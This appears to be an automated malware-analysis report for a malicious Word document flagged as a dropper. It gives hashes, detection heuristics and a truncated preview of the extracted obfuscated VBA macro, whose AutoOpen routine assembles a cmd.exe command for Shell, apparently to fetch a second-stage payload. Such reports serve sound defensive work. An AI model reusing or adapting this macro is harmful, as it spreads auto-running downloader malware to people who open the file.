Office (OLE) malware analysis — malicious · d141d90213f2a5cb

MALICIOUS

Office (OLE)

102.0 KB Created: 2018-08-09 08:44:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: 93b608e9ba6664ed6068366fa4118090 SHA-1: 7c3e8780bd75fc07f254798d0b4797e4ceef0937 SHA-256: d141d90213f2a5cbc84cab94e8575dfa19ce9f0d8b5b7c76e42026bad77d138c

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The AutoOpen macro is designed to execute a command that constructs a string which appears to be intended for downloading and executing a second-stage payload. The macro's obfuscated nature and the use of legacy WordBasic markers suggest a downloader or dropper functionality.

Heuristics 5

ClamAV: Doc.Dropper.Valyria-6667201-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6667201-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10091 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10091 bytes
SHA-256: `9d714c897f906b64c0280b696e949ee822b4fd8b85c7eca9de2a8fc20cf938cf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rWpjZftTqY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName Sqr(83597 - qSvBi + VMZpZE * ZCusv) TypeName aXwcW TypeName Sijvf TypeName Round(381500289) Shell@ KeyString(vbKeyC) + iKwEjPuFRhQld + rUhMRLpukLUw + QSiqciwAhTq + HJHpqsQrEU + IrELUXZo + NjdZCHJOJ + aLcuEc + vOjWjt + hcfqW + YzfwdKfftc + HppbipQN, 665107699 - 665107699 TypeName CByte(22782 - clwDk * 80832 + QSAAIN) TypeName Tan(29487 * jFfbT) TypeName ChrB(24765 / oqTBs) End Sub Attribute VB_Name = "bMfCKiGvpuM" Function QSiqciwAhTq() On Error Resume Next TypeName Sin(szzsCr) TypeName 508345650 TypeName 387 SJMofbtv = "md" + " /V" + "/C" + CStr(Chr(ZHFvatTRwj + zHTjtXj + 34 + PYTGjnNtWtfvkC + SwzzcOVnDMC)) + "s" + "et " + "; " + " " + "=EVL" + "in" + "i" + "DkEU" + "m" TypeName Int(5531) TypeName Fix(14329 * JjFmY * 38925 + lVWLD) TypeName Sqr(aRzTn / RNYBKW) wDzfrCu = "K" + "d" + "Ba" + "pnL" + "mSCU" + "EWUj" + "N" + "." TypeName TwAJi TypeName qjZcTS BCuarUknh = "8" + "wv(" + "=,2" + "$f-u" + "hZoT" + "Ht4{" + "Mr" + "gbs" + "A6;'" + "):" + "5c}" + "Pe" + " +F" TypeName Tan(ujSktj) TypeName Chr(kwIEc) MtLuzITXX = "3\/" + "x@" + "Gl" + "y&&f" + "or" + " %9" + " in" + " " + "(1" TypeName PiUcEd TypeName ChrW(75619699) TypeName Cos(IDPCt - BiGnOJ) msCBbn = "5;41" + ";29;" + "62" + ";48;" + "5" + "1" TypeName Sqr(YmQiOi) TypeName 3171 TypeName 16 qQHSN = ";" + "39" + ";6" + "2;" + "72;" + "72" + ";6" QSiqciwAhTq = SJMofbtv + wDzfrCu + BCuarUknh + MtLuzITXX + msCBbn + qQHSN TypeName Sin(33870 / FDmAF + CntzL / BsVHZb) TypeName Round(1) End Function Function HJHpqsQrEU() On Error Resume Next TypeName Atn(859) TypeName 36 TypeName 888 zLuainzR = "3" + ";35" + ";7;4" + "7;16" + ";32;" TypeName 2 TypeName Chr(666) TypeName Sqr(3) KiZVcEcmUMO = "1" + "6" + ";62;" + "29;3" + "7;4" + "1;5" + "0;2" + "5;6" + "2;59" + ";" + "44;6" TypeName 590 TypeName Atn(BjkJf - bzMwjt / 68004 / mkYJH) SVBwhilbM = "3;" + "26" + ";62" + ";44;" + "27;" + "23;" + "62;" TypeName 4 TypeName CDbl(67) jjZopavu = "50;" + "20;7" + "2;5" + ";6" + "2;" + "16" TypeName 5 TypeName PfNjw TypeName Int(2) WbPUQRQlvb = ";44;" + "54" + ";35;" + "3" + "6" + ";" + "40;" + "2" + "5;3" + "2;5" TypeName 3124 TypeName 9901 wTBiJjV = "5;3" + "9" + ";4" + "4;44" + ";1" + "5;57" + ";6" + "8;6" + "8" + ";" + "44;" + "6" TypeName 683 TypeName CLng(7) TypeName 148 YtMfW = "2;59" + ";" + "39" + ";51" + ";5" + ";51;" + "4" + "4" TypeName 6516 TypeName FIWzDi EHifWRJU = ";5" + "1;41" + ";72" + ";38" + ";44;" + "5;" + "41;1" + "6;" + "27" + ";59" + ";4" TypeName jEClRO TypeName Cos(454379937) kupTHqW = "1;1" + "8;68" + ";43" + ";24;" + "58;7" + "0;" TypeName mjwkJE TypeName 106 TypeName Fix(250506103) wpYjVrbElt = "39;" + "44" + ";44" + ";15" + ";57;" + "6" + "8;" + "68;2" + "9;29" TypeName CByte(iGplJ) TypeName YLwFU lInTw = ";2" + "9;2" + "7;51" + ";38" + ";16" + ";12" + ";14;" + "73" + ";1" + "5;7" + "2;" + "14;1" + "6;16" TypeName Round(9) TypeName ChrW(9107) TypeName nCOhG YZwFLiZEpA = ";" + "5;16" + ";" + "49" + ";27" + ";59" + ";41;" + "1" + "8;" + "6" + "8;6" TypeName Sqr(66) TypeName ChrB(14535 * MsuAn + bBzNA - ACkGz) TypeName 890 HSGwAZiQZC = "5;" + "17;3" + "6;5" + "3;3" + "4;7" + "0;" + "39;4" HJHpqsQrEU = zLuainzR + KiZVcEcmUMO + SVBwhilbM + jjZopavu + WbPUQRQlvb + wTBiJjV + YtMfW + EHifWRJU + kupTHqW + wpYjVrbElt + lInTw + YZwFLiZEpA + HSGwAZiQZC TypeName CLng(47123 + ckuQbl) TypeName CBool(zmBpF - RwSzcK * 66631 / YiCLw) TypeName JmNzj End Function Function IrELUXZo() On Error Resume Next TypeName XvpZs TypeName 12 baKJBAv = "4" + ";44" + ";" + "15;5" + "7" + ";68" + ";68;" + "51;3" + "9;3" + "8;1" + "4;" + "1" + " ... (truncated)

SHA-256: 9d714c897f906b64c0280b696e949ee822b4fd8b85c7eca9de2a8fc20cf938cf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rWpjZftTqY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sqr(83597 - qSvBi + VMZpZE * ZCusv)
   TypeName aXwcW
   TypeName Sijvf
   TypeName Round(381500289)
Shell@ KeyString(vbKeyC) + iKwEjPuFRhQld + rUhMRLpukLUw + QSiqciwAhTq + HJHpqsQrEU + IrELUXZo + NjdZCHJOJ + aLcuEc + vOjWjt + hcfqW + YzfwdKfftc + HppbipQN, 665107699 - 665107699
   TypeName CByte(22782 - clwDk * 80832 + QSAAIN)
   TypeName Tan(29487 * jFfbT)
   TypeName ChrB(24765 / oqTBs)
End Sub


Attribute VB_Name = "bMfCKiGvpuM"
Function QSiqciwAhTq()
On Error Resume Next
TypeName Sin(szzsCr)
   TypeName 508345650
   TypeName 387
SJMofbtv = "md" + " /V" + "/C" + CStr(Chr(ZHFvatTRwj + zHTjtXj + 34 + PYTGjnNtWtfvkC + SwzzcOVnDMC)) + "s" + "et " + "; " + "   " + "=EVL" + "in" + "i" + "DkEU" + "m"
TypeName Int(5531)
   TypeName Fix(14329 * JjFmY * 38925 + lVWLD)
   TypeName Sqr(aRzTn / RNYBKW)
wDzfrCu = "K" + "d" + "Ba" + "pnL" + "mSCU" + "EWUj" + "N" + "."
TypeName TwAJi
   TypeName qjZcTS
BCuarUknh = "8" + "wv(" + "=,2" + "$f-u" + "hZoT" + "Ht4{" + "Mr" + "gbs" + "A6;'" + "):" + "5c}" + "Pe" + " +F"
TypeName Tan(ujSktj)
   TypeName Chr(kwIEc)
MtLuzITXX = "3\/" + "x@" + "Gl" + "y&&f" + "or" + " %9" + " in" + " " + "(1"
TypeName PiUcEd
   TypeName ChrW(75619699)
   TypeName Cos(IDPCt - BiGnOJ)
msCBbn = "5;41" + ";29;" + "62" + ";48;" + "5" + "1"
TypeName Sqr(YmQiOi)
   TypeName 3171
   TypeName 16
qQHSN = ";" + "39" + ";6" + "2;" + "72;" + "72" + ";6"
QSiqciwAhTq = SJMofbtv + wDzfrCu + BCuarUknh + MtLuzITXX + msCBbn + qQHSN
   TypeName Sin(33870 / FDmAF + CntzL / BsVHZb)
   TypeName Round(1)
End Function
Function HJHpqsQrEU()
On Error Resume Next
TypeName Atn(859)
   TypeName 36
   TypeName 888
zLuainzR = "3" + ";35" + ";7;4" + "7;16" + ";32;"
TypeName 2
   TypeName Chr(666)
   TypeName Sqr(3)
KiZVcEcmUMO = "1" + "6" + ";62;" + "29;3" + "7;4" + "1;5" + "0;2" + "5;6" + "2;59" + ";" + "44;6"
TypeName 590
   TypeName Atn(BjkJf - bzMwjt / 68004 / mkYJH)
SVBwhilbM = "3;" + "26" + ";62" + ";44;" + "27;" + "23;" + "62;"
TypeName 4
   TypeName CDbl(67)
jjZopavu = "50;" + "20;7" + "2;5" + ";6" + "2;" + "16"
TypeName 5
   TypeName PfNjw
   TypeName Int(2)
WbPUQRQlvb = ";44;" + "54" + ";35;" + "3" + "6" + ";" + "40;" + "2" + "5;3" + "2;5"
TypeName 3124
   TypeName 9901
wTBiJjV = "5;3" + "9" + ";4" + "4;44" + ";1" + "5;57" + ";6" + "8;6" + "8" + ";" + "44;" + "6"
TypeName 683
   TypeName CLng(7)
   TypeName 148
YtMfW = "2;59" + ";" + "39" + ";51" + ";5" + ";51;" + "4" + "4"
TypeName 6516
   TypeName FIWzDi
EHifWRJU = ";5" + "1;41" + ";72" + ";38" + ";44;" + "5;" + "41;1" + "6;" + "27" + ";59" + ";4"
TypeName jEClRO
   TypeName Cos(454379937)
kupTHqW = "1;1" + "8;68" + ";43" + ";24;" + "58;7" + "0;"
TypeName mjwkJE
   TypeName 106
   TypeName Fix(250506103)
wpYjVrbElt = "39;" + "44" + ";44" + ";15" + ";57;" + "6" + "8;" + "68;2" + "9;29"
TypeName CByte(iGplJ)
   TypeName YLwFU
lInTw = ";2" + "9;2" + "7;51" + ";38" + ";16" + ";12" + ";14;" + "73" + ";1" + "5;7" + "2;" + "14;1" + "6;16"
TypeName Round(9)
   TypeName ChrW(9107)
   TypeName nCOhG
YZwFLiZEpA = ";" + "5;16" + ";" + "49" + ";27" + ";59" + ";41;" + "1" + "8;" + "6" + "8;6"
TypeName Sqr(66)
   TypeName ChrB(14535 * MsuAn + bBzNA - ACkGz)
   TypeName 890
HSGwAZiQZC = "5;" + "17;3" + "6;5" + "3;3" + "4;7" + "0;" + "39;4"
HJHpqsQrEU = zLuainzR + KiZVcEcmUMO + SVBwhilbM + jjZopavu + WbPUQRQlvb + wTBiJjV + YtMfW + EHifWRJU + kupTHqW + wpYjVrbElt + lInTw + YZwFLiZEpA + HSGwAZiQZC
   TypeName CLng(47123 + ckuQbl)
   TypeName CBool(zmBpF - RwSzcK * 66631 / YiCLw)
   TypeName JmNzj
End Function
Function IrELUXZo()
On Error Resume Next
TypeName XvpZs
   TypeName 12
baKJBAv = "4" + ";44" + ";" + "15;5" + "7" + ";68" + ";68;" + "51;3" + "9;3" + "8;1" + "4;" + "1" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.